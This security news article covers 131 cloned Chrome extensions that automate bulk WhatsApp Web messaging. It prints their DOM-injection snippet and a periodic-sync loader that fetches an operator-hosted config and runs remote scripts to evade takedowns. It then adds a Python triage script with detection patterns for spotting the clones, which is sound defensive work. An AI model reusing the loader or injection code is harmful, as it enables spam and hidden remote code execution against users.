Over the past several months, cybersecurity researchers have observed a surge of fraudulent Chrome extensions masquerading as legitimate WhatsApp Web automation tools.
These 131 rebranded clones, each presenting as distinct offerings, share an identical codebase designed to automate bulk messaging and scheduling without user consent.
By injecting custom scripts directly into the WhatsApp Web interface, the extensions bypass native rate limits and anti-spam measures.
Each listing advertises features such as message templates, scheduling controls, and analytics dashboards that appeal to small businesses, particularly in Brazil, where WhatsApp is critical for customer outreach.
The extensions exploit Chrome’s Manifest V3 service worker capabilities to run background tasks, scheduling bulk sends without explicit user interaction.
Socket.dev analysts noted that the core module relies on a code snippet like the following:
    document.addEventListener('DOMContentLoaded', () => {
      // grab WhatsApp Web's internal send helper once the page has loaded
      const msgHelper = window.WPP.helpers.sendMessage;
      // fire each queued message after its scheduled delay
      scheduledMessages.forEach(({contact, text, time}) => {
        setTimeout(() => msgHelper(contact, text), time);
      });
    });
This injection attaches to the page’s DOM and invokes WhatsApp’s internal APIs, blurring the line between legitimate automation and malicious spamming campaigns.
Socket.dev researchers identified that the service worker fetches a remote configuration file hosted on the operator’s infrastructure, enabling dynamic updates to message patterns and throttling parameters to evade detection.
Despite Chrome Web Store policies prohibiting duplicate experiences and unauthorized messaging, all 131 extensions remained live as of mid-October 2025.
Each clone is marketed under glossy landing pages with assurances of privacy compliance and rigorous code audits—claims that contradict platform guidelines.
The extensions are distributed via a franchise-like reseller program: partners pay an upfront fee to license the tool, receive a custom branding package, and manage subscription plans while the original operator retains control over the backend.
Evasion and Persistence Tactics
The most sophisticated aspect of this campaign lies in its detection evasion strategy. By tuning send intervals, randomizing message content, and rotating publisher accounts, the operators maintain continuous operations despite takedown requests.
A key persistence tactic involves polling the operator's server for updated JavaScript payloads at regular intervals:
    self.addEventListener('periodicsync', event => {
      event.waitUntil(
        fetch(configUrl)                              // pull the operator-hosted config
          .then(response => response.json())
          .then(cfg => importScripts(cfg.payloadUrl)) // load whatever script it points to
      );
    });
This Manifest V3 periodic sync registration ensures that even if Chrome flags a particular payload, the extension can reload an unflagged version from the remote server.
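The two behaviours described above (the DOM injection that calls WhatsApp Web's internal API, and the periodic-sync loader that pulls code from a remote URL) give a defender something concrete to hunt for in an extension corpus. The following Python triage script is an added example, not Socket.dev's tooling: it fingerprints each extension's scripts after stripping brand strings and comments so that rebranded clones hash identically, and flags the heuristic indicators drawn from this article; the extension ids, brand names and `.example` domains are constructed for the demo.

```python
import hashlib
import re
# Heuristic indicators drawn from the campaign described above (assumed patterns, not a vendor signature).
PATTERNS = {
    "dynamic_importScripts": re.compile(r"importScripts\(\s*[^'\")]"),  # importScripts() with a non-literal URL
    "periodicsync_listener": re.compile(r"['\"]periodicsync['\"]"),
    "wpp_internal_api": re.compile(r"window\.WPP\."),
}

def normalize(src):
    """Drop string literals, comments and whitespace so rebranded copies hash to the same value."""
    src = re.sub(r"(['\"])(?:(?!\1).)*\1", "STR", src)   # strings first, so '//' inside URLs survives
    src = re.sub(r"//[^\n]*|/\*.*?\*/", "", src, flags=re.S)
    return re.sub(r"\s+", "", src)

def fingerprint(scripts):
    body = "\n".join(normalize(scripts[name]) for name in sorted(scripts))  # stable file order
    return hashlib.sha256(body.encode()).hexdigest()[:16]

def indicators(manifest, scripts):
    """Names of the indicators an extension trips; the clone profile trips all of them."""
    hosts = list(manifest.get("host_permissions", [])) + [
        m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])]
    found = ["targets_whatsapp_web"] if any("web.whatsapp.com" in h for h in hosts) else []
    code = "\n".join(scripts.values())
    return found + [name for name, pat in PATTERNS.items() if pat.search(code)]

def cluster(extensions):
    """Group extension ids by fingerprint: many ids under one hash is the rebranded-clone pattern."""
    groups = {}
    for ext_id, (_manifest, scripts) in extensions.items():
        groups.setdefault(fingerprint(scripts), []).append(ext_id)
    return groups

def clone_sample(brand, domain):
    """Constructed sample mirroring the snippets above; only the brand name and config host differ."""
    manifest = {"name": brand, "manifest_version": 3, "host_permissions": ["https://web.whatsapp.com/*"]}
    sw = ("// " + brand + " background worker\n"
          "const configUrl = 'https://" + domain + "/cfg.json';\n"
          "self.addEventListener('periodicsync', e => e.waitUntil(fetch(configUrl)"
          ".then(r => r.json()).then(cfg => importScripts(cfg.payloadUrl))));\n")
    inject = "document.addEventListener('DOMContentLoaded', () => window.WPP.helpers.sendMessage(c, t));"
    return manifest, {"sw.js": sw, "inject.js": inject}

SAMPLES = {  # constructed corpus: two rebranded clones plus an unrelated extension loading a bundled script
    "ext_aaa": clone_sample("ZapBlaster", "zapblaster.example"),
    "ext_bbb": clone_sample("WA Sender Max", "wasender.example"),
    "ext_ccc": ({"name": "Tab Notes", "manifest_version": 3},
                {"sw.js": "self.addEventListener('install', () => importScripts('lib.js'));"}),
}
```

Run against a real corpus of unpacked CRX directories, the same two functions make a large cluster under one fingerprint with the full indicator set stand out from ordinary extensions that only load their own bundled scripts.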
Coupled with varied naming conventions and thousands of active users across listings, the campaign exemplifies policy abuse at scale and underscores the need for enhanced extension governance and user vigilance.